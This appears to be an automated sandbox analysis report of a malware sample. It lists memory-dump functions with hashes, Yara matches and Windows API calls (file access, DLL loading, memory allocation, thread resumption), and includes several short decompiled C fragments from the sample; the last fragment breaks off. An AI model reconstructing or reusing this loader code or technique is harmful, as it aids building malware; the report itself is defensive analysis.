                                                      • Opcode Fuzzy Hash: ec7dd6e84de2c3787983cfe20b1e345d9621a0360114d7790831b223e9f12544
                                                      • Instruction Fuzzy Hash: 6C3199B4D002599FCB14CFAAD884ADEFBF5AB49314F14906AE818B7320D334A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 02B117BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID: A8y&
                                                      • API String ID: 2591292051-73667374
                                                      • Opcode ID: 62d444b54d71506d485c2077bfa5b927441ebb879eb6e0493fd85af6b2d3954f
                                                      • Instruction ID: 439e0850c625ec0dfab789b0d144c484081d7b4ef015fa720c8ea5a688e33584
                                                      • Opcode Fuzzy Hash: 62d444b54d71506d485c2077bfa5b927441ebb879eb6e0493fd85af6b2d3954f
                                                      • Instruction Fuzzy Hash: 2D31ACB9D002189FCB10CFA9E484AEEFBF4AF49324F14905AE918B7310C334A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 063AE086
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID: A8y&
                                                      • API String ID: 947044025-73667374
                                                      • Opcode ID: f1f32b076025f369e7379b79c580d04966364c918995415a6a857833d66d62bd
                                                      • Instruction ID: a4f99d684c78761c89fb92ec01de30c4f59a9e51078f206d90f1aa5dafbc4a58
                                                      • Opcode Fuzzy Hash: f1f32b076025f369e7379b79c580d04966364c918995415a6a857833d66d62bd
                                                      • Instruction Fuzzy Hash: 6E31ACB4D052189FDF14DFAAD884ADEFBB4EB49314F14942AE815B7300CB35A905CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 02B117BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID: A8y&
                                                      • API String ID: 2591292051-73667374
                                                      • Opcode ID: 3cf655144cfa0459fbaf60dfe6ecdd85f251d47fb7e07072ec06283f702bf4c0
                                                      • Instruction ID: 86ab28952e8ba1936b23da5a25a360496c7f9fa0cfae1f35f7e305856b0416b0
                                                      • Opcode Fuzzy Hash: 3cf655144cfa0459fbaf60dfe6ecdd85f251d47fb7e07072ec06283f702bf4c0
                                                      • Instruction Fuzzy Hash: 0B21AEB5D042589FCB10CFA9D484AEEFBF4AF49324F14905AE914B7310D734A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 06A2D3BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID: A8y&
                                                      • API String ID: 2591292051-73667374
                                                      • Opcode ID: 6a0f26c51da6b2ea113d56c674bb42f30c14dc396c4d1fc466235fac76dd3240
                                                      • Instruction ID: 79a8ae88a54bfe4aa7d9d0ab48d9e374c0387abbd4c18cf02e67574428234db3
                                                      • Opcode Fuzzy Hash: 6a0f26c51da6b2ea113d56c674bb42f30c14dc396c4d1fc466235fac76dd3240
                                                      • Instruction Fuzzy Hash: 6B31BBB9D002599FDB10DFA9D584ADEFBF0AF08324F25805AE854B7311D334AA45CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 06A2D3BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID: A8y&
                                                      • API String ID: 2591292051-73667374
                                                      • Opcode ID: 1a93e40f8c722cf3d782b49a7e5514e3575c9d31434cd17c3f47851d164d2876
                                                      • Instruction ID: 965042fdab395077fa2bc31903016eaa8a38337804ee912b5ad49246f75b0b67
                                                      • Opcode Fuzzy Hash: 1a93e40f8c722cf3d782b49a7e5514e3575c9d31434cd17c3f47851d164d2876
                                                      • Instruction Fuzzy Hash: 173199B5D002199FDB10DFA9D484ADEFBF4AB48324F24805AE815B7310D374AA45CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%


                                                      Non-executed Functions

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 0-3232529671
                                                      • Opcode ID: f44fbc0da63e28e094292d60f41bf4e9af3c81358aa2eb6911c92aa8b715d23a
                                                      • Instruction ID: 210a057106f5542fd183276054fafbcd47b407699a4b8aed2ce7afefee127742
                                                      • Opcode Fuzzy Hash: f44fbc0da63e28e094292d60f41bf4e9af3c81358aa2eb6911c92aa8b715d23a
                                                      • Instruction Fuzzy Hash: C0E1E370E04229CFDB64DFA9C880BDDFBB1BF49304F1091A9D819AB290DB749985CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 0-3232529671
                                                      • Opcode ID: 103096c6b7b8e3364f9a0d7a2655478a4ba3f371dbafe7a0db6df47b8d16ae28
                                                      • Instruction ID: b50033694d2a00ca4ae14526cc4563415af71d71220eaa928659417233f648c8
                                                      • Opcode Fuzzy Hash: 103096c6b7b8e3364f9a0d7a2655478a4ba3f371dbafe7a0db6df47b8d16ae28
                                                      • Instruction Fuzzy Hash: 8D4110B4D00259DFDB54DFA9D984BEEBBF1BB0A314F248129E814AB350D7749885CF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 0-3232529671
                                                      • Opcode ID: 6dca8491ed1e26171fae59dd9a5947cada9258a78e36d6161768b54c030bb45b
                                                      • Instruction ID: e186dcd0371b11ac4348f57ba266c9fbaf5975062cd5d2ae0dc4423065fe2c56
                                                      • Opcode Fuzzy Hash: 6dca8491ed1e26171fae59dd9a5947cada9258a78e36d6161768b54c030bb45b
                                                      • Instruction Fuzzy Hash: BD41FDB4D00259DFDB54DFA9D984BAEFBF1BB4A314F208129E814BB240D7749885CF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 8ddefde924596a45079c5653c3df9bad911dee1ee075ebfdf8ac25e2a97339c5
                                                      • Instruction ID: 14f197f1e6d3c29ac01a1ef1e920fba7ec3c3b32520eced1e669c42dc65ebf08
                                                      • Opcode Fuzzy Hash: 8ddefde924596a45079c5653c3df9bad911dee1ee075ebfdf8ac25e2a97339c5
                                                      • Instruction Fuzzy Hash: 6A12CC74E102188FDB54CFA9C984AEDFBF2FF88304F1491A9E809A7255D7349986DF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: x
                                                      • API String ID: 0-2363233923
                                                      • Opcode ID: 679d794066a93bd4c825416714a306fc2fa1abb2ac4ed36926215a2a6eca732e
                                                      • Instruction ID: a354be91089c233364c43db729170d3534b51e64465c1d2de92560a5307a2fcb
                                                      • Opcode Fuzzy Hash: 679d794066a93bd4c825416714a306fc2fa1abb2ac4ed36926215a2a6eca732e
                                                      • Instruction Fuzzy Hash: 00414EB1E056588BEB6CCF6BCD4078EFAF7AFC9200F04C5BA850CAA255DB7009858F55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: n
                                                      • API String ID: 0-2013832146
                                                      • Opcode ID: 8dd997d58bed3a3fb4f0b66339d28421169b1c8004f81e3c892163eda92dbff5
                                                      • Instruction ID: 8c74d6f4698b1dbe4b2302465c44d0f4a099e2ec387a3e270cf1f9b97bebd945
                                                      • Opcode Fuzzy Hash: 8dd997d58bed3a3fb4f0b66339d28421169b1c8004f81e3c892163eda92dbff5
                                                      • Instruction Fuzzy Hash: 39312571E05758CBE75DCF6B8D4568EFAF7AFC9200F18C1B9840CAA264DB3006469F55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Executed Functions

                                                      C-Code - Quality: 21%
                                                      			E00419FCA(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                      				void* _t19;
                                                      				void* _t28;
                                                      				void* _t29;
                                                      				intOrPtr* _t30;
                                                      				void* _t32;
                                                      
                                                      				asm("fst dword [ebp-0x75]");
                                                      				_t14 = _a4;
                                                      				_t30 = _a4 + 0xc48;
                                                      				E0041AB20(_t28, _t14, _t30,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a, _t29);
                                                      				_t6 =  &_a32; // 0x414d32
                                                      				_t12 =  &_a8; // 0x414d32
                                                      				_t19 =  *((intOrPtr*)( *_t30))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t32); // executed
                                                      				return _t19;
                                                      			}









                                                      APIs
                                                      • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: 2MA$2MA
                                                      • API String ID: 2738559852-947276439
                                                      • Opcode ID: 63589ec3e1e046129191fc5836d81b158da8997fc4b32e850e583c0b6458edae
                                                      • Instruction ID: 98ae421c64e618cb2b09f520dca615dbc4e8add42dd12773a1101eeed08372ea
                                                      • Opcode Fuzzy Hash: 63589ec3e1e046129191fc5836d81b158da8997fc4b32e850e583c0b6458edae
                                                      • Instruction Fuzzy Hash: 54F0E2B2200108AFCB14DF99DC91EEB77A9AF8C354F158249BA4DA7241C630E812CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: 2MA$2MA
                                                      • API String ID: 2738559852-947276439
                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction ID: 629a420ec24cda59f7740677f87fbeb895876e778ce4a2e4436109007655ca88
                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction Fuzzy Hash: 4BF0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630F851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: wKA
                                                      • API String ID: 823142352-3165208591
                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction ID: 918681b749d1ebc684007e4c1563b975095bc633172356dce6c62aeb4b4fe286
                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction Fuzzy Hash: 2DF0B2B2205208ABCB08CF89DC95EEB77ADAF8C754F158249BA0D97241C630F851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
                                                      				char* _v8;
                                                      				struct _EXCEPTION_RECORD _v12;
                                                      				struct _OBJDIR_INFORMATION _v16;
                                                      				char _v536;
                                                      				void* _t15;
                                                      				struct _OBJDIR_INFORMATION _t17;
                                                      				struct _OBJDIR_INFORMATION _t18;
                                                      				void* _t30;
                                                      				void* _t31;
                                                      				void* _t32;
                                                      
                                                      				_v8 =  &_v536;
                                                      				_t15 = E0041C810( &_v12, 0x104, _a8);
                                                      				_t31 = _t30 + 0xc;
                                                      				if(_t15 != 0) {
                                                      					_t17 = E0041CC30(__eflags, _v8);
                                                      					_t32 = _t31 + 4;
                                                      					__eflags = _t17;
                                                      					if(_t17 != 0) {
                                                      						E0041CEB0( &_v12, 0);
                                                      						_t32 = _t32 + 8;
                                                      					}
                                                      					_t18 = E0041B060(_v8);
                                                      					_v16 = _t18;
                                                      					__eflags = _t18;
                                                      					if(_t18 == 0) {
                                                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                      						return _v16;
                                                      					}
                                                      					return _t18;
                                                      				} else {
                                                      					return _t15;
                                                      				}
                                                      			}














                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                      • Instruction ID: f2ae6e5e7806921c9eae43ef0be609edf832a6aa20f0d9e7e2e66c408c20611a
                                                      • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                      • Instruction Fuzzy Hash: E40152B5D4020DABDB10DAE1DC82FDEB7789B14308F0041AAA908A7281F634EB54CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041ACF4,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A139
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction ID: b7acdae8d3035396bf3a6cabd8be047a375e4a620bd0b44aa6ca3e6eeb15d15e
                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction Fuzzy Hash: 35F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F810CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction ID: b02a98072ae76633dfac5978dec5414655e95fa3032167deae29744f36717898
                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction Fuzzy Hash: B7D01776200214ABD710EB99DC85FE77BADEF48764F15449ABA189B242C530FA1087E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7a840c72da028147af10cbc7b3acc407d982920d0927bc8a307ae90b0f345b26
                                                      • Instruction ID: 79bfb01dda80238b58b22cfdabe9816f68e2e36efac01f065d6c790aa17fe767
                                                      • Opcode Fuzzy Hash: 7a840c72da028147af10cbc7b3acc407d982920d0927bc8a307ae90b0f345b26
                                                      • Instruction Fuzzy Hash: E99002B120500406D150719984047474005A7D4341F52C025A6054564EC6998DD5B6A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a71dab169c405e3026ff0082e042079728becc7b046c0105f458a44a468f4a8d
                                                      • Instruction ID: 692d4e9027130b635d80960ab71a131b92217d6fec7b8c8b75d790e598efbc57
                                                      • Opcode Fuzzy Hash: a71dab169c405e3026ff0082e042079728becc7b046c0105f458a44a468f4a8d
                                                      • Instruction Fuzzy Hash: 729002A134500446D11061998414B074005E7E5341F52C029E2054564DC659CC52B167
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 93862c761c16f5723d4f434f2fe1d8fea166b688e6d2dc26ca7dce802be9ce4d
                                                      • Instruction ID: 0daf39be8af24363e99b2e50f419793b5b4234a2f216ef81fa7c5e1af2ef847e
                                                      • Opcode Fuzzy Hash: 93862c761c16f5723d4f434f2fe1d8fea166b688e6d2dc26ca7dce802be9ce4d
                                                      • Instruction Fuzzy Hash: F390027120500417D121619985047074009A7D4281F92C426A1414568DD6968952F162
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 321fae458367e9be184f099e5dedf400821e63a3e69267b1bae76304ae609c2a
                                                      • Instruction ID: 2ebc8b6ba58e70170362992cd9c1066f9e0d399a7bdc0e420da48929e53eea4d
                                                      • Opcode Fuzzy Hash: 321fae458367e9be184f099e5dedf400821e63a3e69267b1bae76304ae609c2a
                                                      • Instruction Fuzzy Hash: 1F900261246041565555B19984046078006B7E4281792C026A2404960CC5669856F662
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 47449af7ebab8992bdfd7abdc2e313390985503f70b64f56a9c64040bd07dcc7
                                                      • Instruction ID: 7a66c694599a4da42799626b62d2572db962246eeb0c162d2e5ae0881427e0da
                                                      • Opcode Fuzzy Hash: 47449af7ebab8992bdfd7abdc2e313390985503f70b64f56a9c64040bd07dcc7
                                                      • Instruction Fuzzy Hash: CA90026160500506D11171998404717400AA7D4281F92C036A2014565ECA658992F172
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2d61c5fb151b320fb1002956d3e033294c845bb5784d743ef75edcc80a2380f5
                                                      • Instruction ID: 40c15c6c000b8c642820b464d391d426c63e9d0a9f2f8ae241a0cb09ddda78e6
                                                      • Opcode Fuzzy Hash: 2d61c5fb151b320fb1002956d3e033294c845bb5784d743ef75edcc80a2380f5
                                                      • Instruction Fuzzy Hash: 8690026121580046D21065A98C14B074005A7D4343F52C129A1144564CC9558861B562
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ca34a45756cd442ea7c5debef6f6e4dde616f2066c3d381045c18c693430b99b
                                                      • Instruction ID: 24d67dc8972e1af86650f1bc858031b173c65cbc7f6345431267b0e2890b1e53
                                                      • Opcode Fuzzy Hash: ca34a45756cd442ea7c5debef6f6e4dde616f2066c3d381045c18c693430b99b
                                                      • Instruction Fuzzy Hash: C290026160500046415071A9C844A078005BBE5251752C135A1988560DC5998865B6A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ceba40530cd5d0353b2e5c277cb7dddcf9c034b6b3ab401f5ae3312c446dfb2e
                                                      • Instruction ID: dbaca7f71cdd81e77ffc9a7170ee19cf26080f98205ae2c932267a697b9e5286
                                                      • Opcode Fuzzy Hash: ceba40530cd5d0353b2e5c277cb7dddcf9c034b6b3ab401f5ae3312c446dfb2e
                                                      • Instruction Fuzzy Hash: 2290027120540406D1106199881470B4005A7D4342F52C025A2154565DC6658851B5B2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ea1f50b69f7228645a7b08d4e4fffe3a13df45c2f5b30a54090b1f87dd02931c
                                                      • Instruction ID: 1b087d1d7153a522c843f5565ab4d5450d4666402176500f13ae17aad2dfe818
                                                      • Opcode Fuzzy Hash: ea1f50b69f7228645a7b08d4e4fffe3a13df45c2f5b30a54090b1f87dd02931c
                                                      • Instruction Fuzzy Hash: 61900265215000070115A59947046074046A7D9391352C035F2005560CD6618861B162
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8b44800cf08f842f72fb88862ea1e98355898cf7a02b91902231cfd2f80c776a
                                                      • Instruction ID: cea4dc60a500dfe39ddc8953b8e86cb6b0b175eeab2777071d804bb8fac96a67
                                                      • Opcode Fuzzy Hash: 8b44800cf08f842f72fb88862ea1e98355898cf7a02b91902231cfd2f80c776a
                                                      • Instruction Fuzzy Hash: 269002A120600007411571998414717800AA7E4241B52C035E20045A0DC5658891B166
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2ac3c1b293b150bda08e4a6c74af9c1aa8baad8a8b4e3b3f3c9452a6600eb6f7
                                                      • Instruction ID: b341a3c666ac67f5af788d237351bc4df6f00836017523207956357224445602
                                                      • Opcode Fuzzy Hash: 2ac3c1b293b150bda08e4a6c74af9c1aa8baad8a8b4e3b3f3c9452a6600eb6f7
                                                      • Instruction Fuzzy Hash: C690027120500406D11065D994087474005A7E4341F52D025A6014565EC6A58891B172
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID: AP
                                                      • API String ID: 3899507212-2793870665
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: oLA
                                                      • API String ID: 1279760036-3789366272
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: oLA
                                                      • API String ID: 1279760036-3789366272
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 57%
                                                      			E004082E8(void* __ebx, signed int __ecx, void* __edx, intOrPtr _a4, long _a8) {
                                                      				char _v5;
                                                      				char _v67;
                                                      				char _v68;
                                                      				void* _t15;
                                                      				int _t16;
                                                      				void* _t23;
